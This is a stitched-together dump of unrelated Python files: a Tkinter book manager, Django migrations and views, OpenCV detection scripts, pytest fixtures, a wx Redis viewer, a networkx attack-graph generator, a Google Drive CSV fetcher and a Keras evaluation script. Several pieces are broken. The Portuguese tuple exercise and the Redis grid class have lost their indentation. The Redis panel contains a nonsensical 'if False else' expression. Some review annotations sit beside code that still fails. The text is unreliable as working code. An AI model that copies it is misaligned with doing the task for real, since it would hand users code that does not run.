e3.grid(row=1, column=1)
ISBN_text = StringVar()
e4 = Entry(window, textvariable=ISBN_text)
e4.grid(row=1, column=3)

# Result list with attached vertical scrollbar.
list1 = Listbox(window, height=6, width=35)
list1.grid(row=2, column=0, rowspan=6, columnspan=2)
sb1 = Scrollbar(window)
sb1.grid(row=2, column=2, rowspan=6)
list1.configure(yscrollcommand=sb1.set)
sb1.configure(command=list1.yview)
list1.bind('<<ListboxSelect>>', get_selected_row)

# Action buttons.
b1 = Button(window, text="View all", width=12, command=view_command)
b1.grid(column=3, row=2)
b2 = Button(window, text="Search entry", width=12, command=search_command)
b2.grid(column=3, row=3)
b3 = Button(window, text="Add entry", width=12, command=insert_command)
b3.grid(column=3, row=4)
b4 = Button(window, text="Update", width=12, command=update_command)
b4.grid(column=3, row=5)
b5 = Button(window, text="Delete", width=12, command=delete_command)
b5.grid(column=3, row=6)
# BUG FIX: the original Close button had no command and did nothing.
b6 = Button(window, text="Close", width=12, command=window.destroy)
b6.grid(column=3, row=7)

window.mainloop()
|
"""
Crie um programa que vai gerar cinco números aleatórios e colocar
em uma tupla.
Depois disso, mostre a listagem de números gerados e tambem indique o
menos e o maior valor que estão na tupla
"""
from random import randint
numeros = (randint(1, 100), randint(1, 100), randint(1, 100),
randint(1, 100), randint(1, 100))
print('Os números sorteados foram: ', end='')
for n in numeros:
print(f'{n} ', end='')
print(f'\nO maior valor é {max(numeros)} e o menor é {min(numeros)}') |
# This file is only intended for development purposes
from kubeflow.kubeflow.cd import base_runner

# Kick off the CD workflow that builds the Jupyter + TensorFlow notebook
# server image.
base_runner.main(
    component_name="notebook_servers.notebook_server_jupyter_tensorflow",
    workflow_name="nb-j-tf-build")
|
import os
import re
import time
import cv2
import numpy as np
from os.path import isfile, join

# Cascade-classifier based tree detection over a drone video: draws red
# boxes around detections, previews them, and writes annotated frames to
# results.avi.
tree_classifier = cv2.CascadeClassifier('C:\\Users\\titan\\Desktop\\cv_detect\\cascade.xml')
cap = cv2.VideoCapture('C:\\Users\\titan\\Desktop\\cv_detect\\DJI_0017.MP4')
# Output writer: XVID, 20 fps, 4K frame size -- presumably matches the
# source video; TODO confirm.
out = cv2.VideoWriter('results.avi',cv2.VideoWriter_fourcc(*'XVID'), 20, (3840, 2160))
while True:
    # Throttle the loop so the preview is watchable.
    time.sleep(.05)
    ret, frame = cap.read()
    if ret is True:
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # detectMultiScale(scaleFactor=1.3, minNeighbors=5)
        trees = tree_classifier.detectMultiScale(gray, 1.3, 5)
        for (x, y, w, h) in trees:
            image = cv2.rectangle(frame, (x, y), (x+w, y+h), (0,0,255), 2)
            cv2.namedWindow('Trees',cv2.WINDOW_NORMAL)
            cv2.putText(image, 'Tree', (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
            cv2.imshow('Trees', image)
            cv2.resizeWindow('Trees', 900,600)
            # NOTE(review): a frame is written once per detection and frames
            # with no detections are never written -- confirm that is the
            # intended output.
            out.write(image)
        cv2.waitKey(1)
    else:
        # End of video (or read failure).
        break
out.release()
cap.release()
cv2.destroyAllWindows()
|
# coding=utf-8
from django.shortcuts import render_to_response, redirect
from article.models import Article
from comment.forms import CommentParent, CommentParentForm
def article_detail(request, **kwargs):
    """Render one article with its top-level comments and a reply form.

    Expects ``base_context`` (a dict) and ``article_name`` in kwargs,
    supplied by the URL dispatcher / wrapping view.
    """
    context = kwargs['base_context']
    context['article'] = Article.objects.get(name=kwargs['article_name'])
    context['commentParents'] = CommentParent.objects.filter(commentParent_article=context['article'].id)
    # NOTE(review): the form is bound to request.POST even on GET requests
    # (where POST is empty) -- confirm an unbound form isn't wanted here.
    context['form'] = CommentParentForm(request.POST)
    return render_to_response('article_detail.html', context)
|
# imports
import pytest
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

# Available interface language codes, one per line in list_lang.txt.
with open("list_lang.txt", "r") as lang_file:
    list_lang = lang_file.read().splitlines()
# Register the custom pytest command-line option.
def pytest_addoption(parser):
    """Add --language (default 'en-gb') used by the browser fixture."""
    parser.addoption("--language", action = "store",
        default = "en-gb", help = "Enter language:")
# Browser fixture: one Chrome instance per test function.
@pytest.fixture(scope = "function")
def browser(request):
    """Yield a Chrome WebDriver configured for the requested UI language."""
    lang = request.config.getoption("language")
    if lang in list_lang:
        options = Options()
        # Ask Chrome to send/accept content in the chosen language.
        options.add_experimental_option('prefs', {'intl.accept_languages': lang})
        driver = webdriver.Chrome(options=options)
    else:
        raise pytest.UsageError("--language option is not available")
    yield driver
    # Teardown: always quit the browser after the test finishes.
    driver.quit()
# Generated by Django 2.0.5 on 2018-07-08 07:49
import datetime
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated schema for the packages app.

    Creates Item, ItemsList, MonthBudgetAmount and PackageSettings.
    Migration files are replayed verbatim on fresh databases -- do not edit
    an applied migration; add a new one instead.
    """

    initial = True
    dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
    operations = [
        migrations.CreateModel(
            name="Item",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("name", models.CharField(default="", max_length=10)),
                (
                    "amount",
                    models.DecimalField(decimal_places=2, default=1, max_digits=6),
                ),
            ],
        ),
        migrations.CreateModel(
            name="ItemsList",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("name", models.CharField(max_length=50, unique=True)),
                ("place", models.CharField(max_length=50)),
                ("group", models.CharField(blank=True, max_length=30)),
                (
                    "date",
                    models.DateField(
                        default=datetime.date.today,
                        # NOTE(review): RegexValidator("%Y-%m-%d") treats the
                        # strftime format string as a regex -- looks wrong,
                        # but changing an applied migration would break
                        # history; fix it in the model + a new migration.
                        validators=[django.core.validators.RegexValidator("%Y-%m-%d")],
                    ),
                ),
                (
                    "total_amount",
                    models.DecimalField(decimal_places=2, default=0, max_digits=7),
                ),
                ("entry_type", models.PositiveSmallIntegerField(default=0)),
                (
                    "user",
                    models.ForeignKey(
                        blank=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="itemlist_USERMODEL",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={"ordering": ["-id"], "get_latest_by": ["-date"]},
        ),
        migrations.CreateModel(
            name="MonthBudgetAmount",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "budget_amount",
                    models.DecimalField(decimal_places=2, default=0, max_digits=10),
                ),
                (
                    "month_year",
                    models.DateField(
                        # NOTE(review): generation-time constant frozen into
                        # the migration by Django -- harmless here.
                        default=datetime.date(2018, 7, 1),
                        validators=[
                            django.core.validators.RegexValidator(
                                "(19|20)\\d\\d([- /.])(0[1-9]|1[012])\\2(0[1-9]|[12][0-9]|3[01])"
                            )
                        ],
                    ),
                ),
                (
                    "user",
                    models.ForeignKey(
                        blank=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="mba_USERMODEL",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="PackageSettings",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "currency_details",
                    models.CharField(blank=True, default="USD", max_length=3),
                ),
                ("force_mba_update", models.CharField(default="Y", max_length=1)),
                ("active_paytm", models.CharField(default="N", max_length=1)),
                (
                    "user",
                    models.ForeignKey(
                        blank=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="package_settings",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
        migrations.AddField(
            model_name="item",
            name="items_list",
            field=models.ForeignKey(
                on_delete=django.db.models.deletion.CASCADE,
                related_name="items",
                to="packages.ItemsList",
            ),
        ),
        migrations.AlterUniqueTogether(
            name="monthbudgetamount", unique_together={("month_year", "user")}
        ),
    ]
|
'''
Given a year, return the century it is in.
The first century spans from the year 1 up to and including the year 100,
the second - from the year 101 up to and including the year 200, etc.
Let's see some examples:
centuryFromYear(1705) // returns 18
centuryFromYear(1900) // returns 19
centuryFromYear(1601) // returns 17
centuryFromYear(2000) // returns 20
Hope you enjoy it .. Awaiting for Best Practice Codes hahaha ..
Enjoy Learning !!!
'''
def century(year):
    """Return the 1-based century containing *year* (years 1-100 -> 1)."""
    # Ceiling division: a partial century rounds up to the next one.
    return (year + 99) // 100
#!/usr/bin/env python3
"""
test for the Psjson module.
"""
import io
import os
import tempfile
import unittest
from base_test import PschedTestBase
from pscheduler.psjson import *
class TestPsjson(PschedTestBase):
    """
    Psjson tests.
    """

    def test_jsondecomment(self):
        """Test decomment"""
        doc = dict(foo='foo')
        doc['#bar'] = 'bar'
        ret = json_decomment(doc)
        # prefix removed
        self.assertEqual(ret, dict(foo='foo'))

    def test_sub(self):
        """Test substitute"""
        doc = dict(foo='foo')
        ret = json_substitute(doc, 'foo', 'bar')
        # value swapped
        self.assertEqual(ret, dict(foo='bar'))

    def test_load(self):
        """Test loading"""
        dstring = '{"foo": "bar"}'
        ret = json_load(dstring)
        self.assertEqual(ret, dict(foo='bar'))
        # Trailing garbage must make the parse fail.
        dstring += 'xxxx'
        # bad value
        self.assertRaises(ValueError, json_load, dstring)

    def test_file(self):
        """Test loading from a file"""
        # PORT: Unix only
        with open("/dev/null", "r") as infile:
            # All we care is that it doesn't like the input.
            self.assertRaises(ValueError, json_load, infile)

    def test_dump(self):
        # json_dump emits compact separators (no spaces).
        doc = dict(foo='foo')
        ret = json_dump(doc)
        self.assertEqual(ret, '{"foo":"foo"}')

    #
    # JSON Streaming Classes
    #

    def test_RFC7464_emitter(self):
        # Each record is prefixed with RS (0x1e) and terminated by newline.
        buf = io.StringIO()
        emitter = RFC7464Emitter(buf)
        emitter({"foo": 123})
        emitter({"bar": 123})
        self.assertEqual(buf.getvalue(),
                         '\x1e{"foo":123}\n\x1e{"bar":123}\n')

    def test_RFC7464_parser(self):
        buf=io.StringIO('\x1e{"foo": 123}\nXYZZY\n')
        parser = RFC7464Parser(buf)
        # First line is valid
        self.assertEqual(parser(), {"foo": 123})
        # Second line is bogus
        self.assertRaises(ValueError, parser)
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
|
import re
def abbreviate(phrase):
    """Build an acronym from *phrase*: the upper-cased first letter of each
    word and of each CamelCase hump."""
    pieces = re.findall(r'[A-Z]+[a-z]*|[a-z]+', phrase)
    initials = [piece[0].upper() for piece in pieces]
    return ''.join(initials)
# Quick manual check when the module is run as a script.
if __name__ == '__main__':
    print(abbreviate('HyperText Markup language'))
|
# Generated by Django 3.0.8 on 2020-09-06 09:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: make MyUser.roleid a nullable OneToOneField to
    crm_user.UserRole.  Do not edit an applied migration."""
    dependencies = [
        ('crm_user', '0003_auto_20200905_1900'),
    ]
    operations = [
        migrations.AlterField(
            model_name='myuser',
            name='roleid',
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='users', to='crm_user.UserRole'),
        ),
    ]
|
# -*- coding: utf-8 -*-
#import re
import wx
class RedisDataGrid(wx.grid.Grid):
KEY_COL = 0
DATA_TYPE_COL = 1
VALUE_COL = 2
def __init__(self, parent, id):
wx.grid.Grid.__init__(self, parent, id, size=(1000, 500))
self._redis = None
self._data = None
self._last_line = 1
self.CreateGrid(2,3)
self.SetColLabelSize(0)
self.SetRowLabelSize(0)
#セルの横幅を指定
self.SetColSize(0, 350)
self.SetColSize(1, 350)
self.SetColSize(2, 350)
#ラベルの設定
self.SetCellValue(0, self.KEY_COL, "Key")
self.SetCellValue(0, self.DATA_TYPE_COL, "Data Type")
self.SetCellValue(0, self.VALUE_COL, "Value")
self._bind()
def _bind(self):
# セルの内容を変更
self.Bind(wx.grid.EVT_GRID_CELL_CHANGE, self._onCellCange)
# 右クリックでメニュー表示
self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self._on_right_up)
self.Bind(wx.EVT_RIGHT_UP, self._on_right_up)
def _on_right_up(self, evt):
"""
右クリックメニュー
"""
if not hasattr(self, "popup_id1"):
self.popup_id1 = wx.NewId()
self.Bind(wx.EVT_MENU, self._delete_data, id=self.popupID1)
menu = wx.Menu()
menu.Append(self.popup_id1, u"削除")
self.PopupMenu(menu)
menu.Destroy()
def _delete_data(self, evt):
print "delete event"
pass
def _onCellCange(self, evt):
row = evt.GetRow()
col = evt.GetCol()
#TODO KEYが変更されたときの仕様
value = self.GetCellValue(row, col)
key = self.GetCellValue(row, self.KEY_COL)
#list_match = re.compile('^\[[^\[|\]]*]$')
setattr(self._redis, key, value)
def generate_redis_data_grid(self, redis, callback=None):
self._redis = redis
self._data = self._redis.get_all(key=True)
self._clear_grid(1)
self._generate_redis_data_grid()
if callback:
callback()
def _generate_redis_data_grid(self):
for redis_data in self._data:
key = redis_data[0]
value = redis_data[1]
data_type = type(value).__name__
try:
self.SetCellValue(self._last_line, 0, key)
self.SetCellValue(self._last_line, 1, data_type)
self.SetCellValue(self._last_line, 2, value)
except wx._core.PyAssertionError:
print redis_data
pass
else:
self._update_last_line()
self.AppendRows(self._last_line)
def _clear_grid(self, num=None):
self._update_last_line(num)
self.ClearGrid()
def search_key_result(self, key):
if not self._redis:
return
keys = self._redis.keys(key)
datas = self._redis.get_by_keys(keys)
grid_data = []
for i,data in enumerate(datas):
grid_data.append([keys[i], data])
self._data = grid_data
self._clear_grid(1)
self._generate_redis_data_grid()
def _update_last_line(self, num=None):
if num:
self._last_line = num
else:
self._last_line += 1
def clear_data(self):
self.ClearGrid()
def get_redis(self):
return self._redis
class RedisDataPanel(wx.Panel):
    """Panel hosting a RedisDataGrid inside a grid-bag sizer."""

    def __init__(self, parent, id):
        self._parent = parent
        wx.Panel.__init__(self, parent, id, style=wx.BORDER_SUNKEN)
        grid = wx.GridBagSizer(hgap=5, vgap=5)
        self._rgrid = RedisDataGrid(self, -1)
        grid.Add(self._rgrid, pos=(0,0))
        self.SetSizerAndFit(grid)

    def generate_redis_data_grid(self, redis):
        """Populate the grid, locking the settings panel while loading."""
        self._parent.GetParent().settings_panel.update_lock_flag(True)
        self._rgrid.generate_redis_data_grid(self._rgrid and redis, lambda: self._parent.GetParent().settings_panel.update_lock_flag(False)) if False else self._rgrid.generate_redis_data_grid(redis, lambda: self._parent.GetParent().settings_panel.update_lock_flag(False))

    def search_key_result(self, key):
        self._rgrid.search_key_result(key)

    def get_redis(self):
        # BUG FIX: the original returned the bound method object
        # (``self._rgrid.get_redis``) instead of calling it.
        return self._rgrid.get_redis()
|
import cv2
import matplotlib.pyplot as plt
import numpy as np

# Plot the first column of each color channel of a training image.
img = cv2.imread("H:/Github/OpenCv/FaceRecognition/TrainingImages/img2.jpg")
# BUG FIX: OpenCV loads images in BGR order, so cv2.split returns
# (blue, green, red).  The original unpacked them as ``r, g, b``,
# mislabelling every channel in the plot.
b, g, r = cv2.split(img)
# First column of each channel plane.
red = r[:, 0]
green = g[:, 0]
blue = b[:, 0]
plt.plot(red, color='r')
plt.plot(green, color='g')
plt.plot(blue, color='b')
plt.show()
from django.urls import path
from . import views
# CRUD routes for Person records.
urlpatterns = [
    path('persons-list/', views.persons_list, name='persons_list'),
    path('persons-create/', views.persons_create, name='persons_create'),
    path('persons-update/<int:id>', views.persons_update, name='persons_update'),
    path('persons-delete/<int:id>', views.persons_delete, name='persons_delete'),
]
#TODO fix those methods - probably broke after moving stuff to separate files
def printDifference(pTable, gaussianPTable, n):
    """Print row *n* of (approx - exact) as an R ``c(...)`` vector,
    without a trailing newline."""
    deltas = [-(pTable[n][i] - gaussianPTable[n][i])
              for i in range(len(pTable[n]))]
    body = ", ".join(str(d) for d in deltas)
    print("difference <- c(" + body + ")", end="")
def printEpsilon(pTable, gaussianPTable, n):
    """Print row *n*'s absolute relative error (in percent) against the
    gaussian approximation, as an R ``c(...)`` vector without newline."""
    exact, approx = pTable[n], gaussianPTable[n]
    terms = []
    for i in range(len(exact)):
        difference = exact[i] - approx[i]
        terms.append(str(abs(difference / approx[i] * 100)))
    print("epsilon <- c(" + ", ".join(terms) + ")", end="")
def printPandPapprox(pTable, gaussianPTable, n):
    """Print row *n* of the exact ('p') and approximated ('pApprox')
    tables, each as an R ``c(...)`` vector on its own line."""
    for label, row in (("p", pTable[n]), ("pApprox", gaussianPTable[n])):
        body = ", ".join(str(v) for v in row)
        print(label + " <- c(" + body + ")")
def calculateVtableStandardDeviations(vTable):
    """Print, for every row of *vTable* after the first, the weighted mean
    squared offset of V from the row's midpoint.

    Fixes vs. original: the half-width used ``math.floor`` although this
    module never imports ``math`` (a guaranteed NameError at call time, in
    line with the module-level TODO); integer floor division is equivalent
    for non-negative lengths and needs no import.
    """
    halfOfArraySize = len(vTable[0]) // 2
    for n in range(1, len(vTable)):
        tableRow = []
        E = 0
        N = 0
        for V in range(len(vTable[0])):
            if vTable[n][V] != 0:
                x = vTable[n][V]
                # Weight the squared offset from the midpoint by the count.
                E += ((V - halfOfArraySize) ** 2) * x
                N += x
        # NOTE(review): raises ZeroDivisionError for an all-zero row --
        # confirm that cannot happen upstream.
        E = E / N
        tableRow.append(E)  # TODO: tableRow is built but never used/returned
        print(E)
    print("done calculating V values")
# Module-level result holders.
# NOTE(review): findWhenGaussianIsEffective() rebinds table1/table2 as
# locals, so these globals are never written -- confirm they are needed.
table1 = []
table2 = []
def findWhenGaussianIsEffective(pTable, gaussianPTable):
    """For each row, try to locate the index where the gaussian
    approximation becomes effective (relative error below 50%).

    NOTE(review): ``x`` is initialised to 0 and never set to 1, so the
    ``elif x == 1`` branch is dead code and the returned lists are always
    empty.  This matches the module-level TODO saying these helpers
    probably broke when code was moved to separate files -- the intended
    fix is unclear, so the logic is left untouched and only documented.
    """
    table1 = []
    table2 = []
    for i in range(len(pTable)):
        x = 0;
        smallestP = 0
        for j in range(len(pTable[0])):
            if(pTable[i][j] != 0):
                errorPresentage = (abs(gaussianPTable[i][j] - pTable[i][j])/ gaussianPTable[i][j]) * 100
                if(errorPresentage < 50):
                    smallestP = pTable[i][j]
                elif(x == 1):
                    # Dead branch: x is never 1 (see docstring).
                    table1.append(j - 1)
                    table2.append(smallestP)
                    x = 0
    return table1, table2
def findHighestApproximationError(pTable, gaussianPTable):
    """For each row, collect the highest relative error (in percent) seen
    within each decade of probability magnitude (0.1, 0.01, ...).

    Returns a list (one entry per row) of lists of per-decade maxima.
    Scanning a row stops at its first zero probability.
    """
    nTable = []
    for i in range(len(pTable)):
        highestErrorList = []
        # Current decade threshold; crossing it closes out the decade.
        lowValue = 0.1
        highestApproximateError = 0
        for j in range(len(pTable[0])):
            p = pTable[i][j]
            if(p < lowValue):
                # Entered the next decade: record the maximum so far.
                lowValue = lowValue / 10
                highestErrorList.append(highestApproximateError)
                highestApproximateError = 0
            if(p == 0):
                break
            pApprox = gaussianPTable[i][j]
            errorPresentage = abs(pApprox - p)/ pApprox * 100
            if(errorPresentage > highestApproximateError):
                #print(p)
                #print(gaussianPTable[i][j])
                #print(errorPresentage)
                highestApproximateError = errorPresentage
        nTable.append(highestErrorList)
        # Progress indicator every ten rows.
        if(i%10==0): print(i)
    return nTable
def printHighestApproxPTable(table, nTable):
    """Print each per-decade column of *table* as an R ``c(...)`` vector.

    Vector i is named 'kuni<threshold>' where the threshold is 10**-(i+1);
    rows with fewer than i+1 entries print NA for that column.
    NOTE(review): *nTable* is accepted but unused -- confirm it can go.
    """
    tableSize = len(table) - 1
    for i in range(len(table[tableSize])):
        number = 10 ** (i + 1)
        name = "kuni" + str(1 / (number))
        print(name + " <- c(", end="")
        first = True
        for j in range(len(table)):
            if(not first):
                print(", ", end="")
            if(len(table[j]) > i ):
                print(str(table[j][i]), end="")
            else:
                # Row j has no value for this decade.
                print("NA", end="")
            first = False
        print(")")
def printPvsPdata(Pexact, Papprox, n):
    """Print the length of exact row *n*, then both the exact and the
    approximated rows as R ``c(...)`` vectors, truncated at the first
    zero in the exact row."""
    exact_row = Pexact[n]
    print(len(exact_row))
    # Index of the first zero entry (or the full length if none).
    cutoff = len(exact_row)
    for idx, value in enumerate(exact_row):
        if value == 0:
            cutoff = idx
            break
    exact_body = ", ".join(str(v) for v in exact_row[:cutoff])
    print("pExact <- c(" + exact_body + ")")
    approx_body = ", ".join(str(v) for v in Papprox[n][:cutoff])
    print("pApprox <- c(" + approx_body + ")")
|
# Generates an attack graph of state nodes and vulnerability nodes
import networkx as nx
from input_parser import Parser
from state_node import StateNode
class GraphGenerator(object):
    """Builds a directed attack graph of state and vulnerability nodes.

    State nodes represent (host, access level); vulnerability nodes are
    exploitable services.  Edges alternate state -> vulnerability ->
    new state as privileges are gained.
    """

    def __init__(self, startNodeSet, adjList, vulnDict, portDict):
        # startNodeSet: initial attacker StateNodes.
        # adjList: hostname -> set of reachable (hostname, port) tuples.
        # vulnDict: (host, port) -> set of vulnerability nodes.
        # portDict: hostname -> iterable of open ports.
        self.startNodeSet = startNodeSet
        self.adjList = adjList
        self.vulnDict = vulnDict
        self.portDict = portDict

    # needs to link with network topology
    def get_reachable(self, hostname):
        """Return the (hostname, port) tuples reachable from *hostname*."""
        reachableSet = self.adjList[hostname]
        return reachableSet

    def get_vulnerabilities(self, host, port):
        """Return the vulnerability set for (host, port), or None."""
        if (host, port) not in self.vulnDict:
            return None
        return self.vulnDict[(host, port)]

    def get_access_granted(self, vulnerabilityNode, currAccessLevel):
        """Access level an attacker holds after exploiting the node.

        NOTE(review): returns None implicitly when accessVector is neither
        'Network' nor 'Local' -- confirm those are the only values.
        """
        if vulnerabilityNode.accessVector == 'Network':
            return vulnerabilityNode.accessLevel
        elif vulnerabilityNode.accessVector == 'Local':
            # Local exploits can only raise, never lower, the access level.
            if currAccessLevel < vulnerabilityNode.accessLevel:
                return vulnerabilityNode.accessLevel
            else:
                return currAccessLevel

    def generate_graph(self):
        """Breadth-first expansion from the start nodes; returns a DiGraph."""
        DG = nx.DiGraph()
        # add vulnerabilities for start nodes
        for startNode in self.startNodeSet:
            startNodePorts = self.portDict[startNode.hostname]
            for port in startNodePorts:
                vulnerabilitySet = self.get_vulnerabilities(startNode.hostname, port)
                if not vulnerabilitySet:
                    continue
                for vulnerabilityNode in vulnerabilitySet:
                    # Mark entry-point vulnerabilities on the start hosts.
                    vulnerabilityNode.entry = True
                    if vulnerabilityNode.requiredPrivilege == 0:
                        startNode.accessLevel = vulnerabilityNode.accessLevel
                        DG.add_edge(vulnerabilityNode, startNode)
                        # print("Added edge from {} to {}".format(vulnerabilityNode.to_string(), startNode.to_string()))
        stateNodeSet = self.startNodeSet
        newStateNodes = set()
        # Frontier loop: expand each generation of state nodes until no
        # new ones appear.
        while stateNodeSet:
            # iterate through each state node's reachable node set
            for index, stateNode in enumerate(stateNodeSet):
                # print("State node: {}".format(stateNode.to_string()))
                host = stateNode.hostname
                currAccessLevel = stateNode.accessLevel
                reachableSet = self.get_reachable(host)
                # reachable is a tuple (hostname, port)
                for reachable in reachableSet:
                    # print("Host {} is reachable to host {}, port {}".format(host, reachable[0], reachable[1]))
                    vulnerablitySet = self.get_vulnerabilities(reachable[0], reachable[1])
                    if not vulnerablitySet: # No vulnerabilities associated
                        continue
                    # add each vulnerability node as the state node's child node if:
                    # 1) sufficient privilege level
                    # 2) reachable to port associated with that vulnerability
                    for vulnerabilityNode in vulnerablitySet:
                        # print("Reachable node {} has vulnerability {}".format(reachable, vulnerabilityNode.to_string()))
                        # Local vulnerabilities only apply on the same host.
                        if (currAccessLevel >= vulnerabilityNode.requiredPrivilege) and not (vulnerabilityNode.accessVector == 'Local' and not host == reachable[0]):
                            if not DG.has_edge(vulnerabilityNode, stateNode) and not DG.has_edge(stateNode, vulnerabilityNode):
                                # print("No edge from {} to {}".format(vulnerabilityNode.to_string(), stateNode.to_string()))
                                DG.add_edge(stateNode, vulnerabilityNode)
                                # print("Added edge from {} to {}".format(stateNode.to_string(), vulnerabilityNode.to_string()))
                                newAccessLevel = self.get_access_granted(vulnerabilityNode, currAccessLevel)
                                vulnerableNode = StateNode(reachable[0], newAccessLevel)
                                if not DG.has_node(vulnerableNode):
                                    newStateNodes.add(vulnerableNode)
                                    # print("Adding {} to newStateNodes".format(vulnerableNode.to_string()))
                                if not DG.has_edge(vulnerabilityNode, vulnerableNode):
                                    DG.add_edge(vulnerabilityNode, vulnerableNode)
                                    # print("Added edge from {} to {}".format(vulnerabilityNode.to_string(), vulnerableNode.to_string()))
                # NOTE(review): swapping the frontier on the last enumerate
                # index relies on set iteration order; rebinding inside the
                # for loop is safe (iteration continues over the old set)
                # but a plain swap after the loop would be clearer.
                if index == len(stateNodeSet) - 1:
                    stateNodeSet = newStateNodes
                    newStateNodes = set()
        # pos = nx.spring_layout(DG)
        # nx.draw_networkx_nodes(DG, pos)
        # nx.draw_networkx_edges(DG, pos)
        # plt.show()
        return DG
|
from django.db import models
from django.contrib.auth.models import User
class PatientFamily(models.Model):
    # A family of patients owned by one account user.
    # NOTE: ForeignKey without on_delete implies Django < 2.0.
    user = models.ForeignKey(User)
    last_name = models.CharField(max_length=30)
    def __str__(self):
        return self.last_name
class Patient(models.Model):
    # One member of a PatientFamily.
    family = models.ForeignKey(PatientFamily)
    last_name = models.CharField(max_length=30)
    first_name = models.CharField(max_length=20)
    def __str__(self):
        # "Last, First" display form.
        return f"{self.last_name}, {self.first_name}"
class Schedule(models.Model):
    # A patient's vaccination schedule.
    patient = models.ForeignKey(Patient)
    def __str__(self):
        return self.patient.first_name + "'s Schedule"
class Vaccine(models.Model):
    # A vaccine appearing on a schedule.
    schedule = models.ForeignKey(Schedule)
    name = models.CharField(max_length=50)
    description = models.TextField()
    def __str__(self):
        return self.name
class Dose(models.Model):
    # One administration of a vaccine; date is optional until given.
    vaccine = models.ForeignKey(Vaccine)
    name = models.CharField(max_length=60)
    given = models.BooleanField(default=False)
    date = models.DateField(blank=True, null=True)
    def __str__(self):
        return f'{self.vaccine.schedule.patient.first_name} {self.vaccine.schedule.patient.last_name} - {self.name}'
|
#!/usr/bin/python
"""Series-expand P = r0/sqrt(r0**2 - c*h**2) and its h-derivative.

Fixes vs. original: ``diff`` was missing from the sympy import, so
``DP = diff(P, h)`` raised NameError; the second print also repeated
``series(P, h)`` where the derivative's series was presumably intended
(DP was otherwise unused).  The unused ``cos`` import is dropped.
"""
from sympy import Symbol, diff, series, sqrt

h = Symbol('h')
c = Symbol('c')
r0 = Symbol('r0')
P = r0 / sqrt(r0**2 - c * h**2)
print(series(P, h))
DP = diff(P, h)
print(series(DP, h))
|
import csv
import httplib2
import logging
import pprint
import sys
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from settings.local import *
logging.basicConfig()
def get_csv(client_email, client_key, document_id):
# Create an httplib2.Http object to handle our HTTP requests and authorize it
# with the Credentials. Note that the first parameter, service_account_name,
# is the Email address created for the Service account. It must be the email
# address associated with the key that was created.
scope = 'https://www.googleapis.com/auth/drive'
credentials = SignedJwtAssertionCredentials(CLIENT_EMAIL, client_key, scope=scope)
http = httplib2.Http()
http = credentials.authorize(http)
# Url to download the file in CSV
exportUrl = "https://docs.google.com/feeds/download/spreadsheets/Export?key=%s&exportFormat=csv&gid=0" % DOCUMENT_ID
print "Fetching: %s" % exportUrl
(headers, content) = http.request(exportUrl)
if headers.status != 200:
raise Exception("Error downloading CSV: %s" % content)
print "Got %s bytes" % headers['content-length']
return content
def main(argv):
    """Fetch the configured spreadsheet and save it as submissions.csv."""
    # Load the service-account private key.
    with open(KEY_PATH, 'rb') as f:
        key = f.read()
    # Fetch the document as CSV.
    # NOTE: this local name shadows the imported csv module inside main().
    csv = get_csv(CLIENT_EMAIL, key, DOCUMENT_ID)
    # Save it to disk
    with open('submissions.csv', 'w') as f:
        f.write(csv)
if __name__ == '__main__':
    main(sys.argv)
|
# the relation between height and positioning error
import os
import numpy as np
from sklearn import preprocessing
import csv
import time
import random
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
from keras import Input,Model
from keras.models import Sequential,save_model
from keras.layers import Dense,Activation,Dropout
from keras.optimizers import Adam,TFOptimizer
from keras.utils import plot_model
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
def mkdir(newpath):
    """Create directory `newpath` (including parents).

    Returns True when the directory was created, False when it already existed.
    Prints a status message either way.
    """
    if os.path.exists(newpath):
        print("the path exists!")
        return False
    print("the path is created successfully!")
    os.makedirs(newpath)
    return True
def read_csv(filename):
    """Read a numeric CSV file into a float numpy array (one row per CSV line)."""
    # BUG FIX: the original called `f.close` without parentheses, so the file
    # was never closed; a `with` block guarantees closure even on error.
    with open(filename, 'r') as f:
        rows = [row for row in csv.reader(f)]
    return np.array(rows, dtype=float)
# ---- Evaluate a trained Keras model: positioning error vs. height ----
# Load feature/label CSVs (read_csv returns float numpy arrays).
train_features = read_csv('train_features.csv')
train_labels = read_csv('train_labels.csv')
test_features = read_csv('test_features_height.csv')
test_labels = read_csv('test_labels_height.csv')
# Output directory for the error CSVs.
newpath = "./plot_loss_value/"
mkdir(newpath)
# Pre-trained checkpoint (filename encodes hyper-parameters and a loss value).
model = load_model('./keras_debug_adm_final_1/L=3,N=215,act=elu,dropout=0.2,lr=0.001_84.51871490478516.hdf5')
loss=[]
prediction = []
time_list=[]
data_value = test_features
label_value = test_labels
# Predict one sample at a time so per-sample inference latency can be timed.
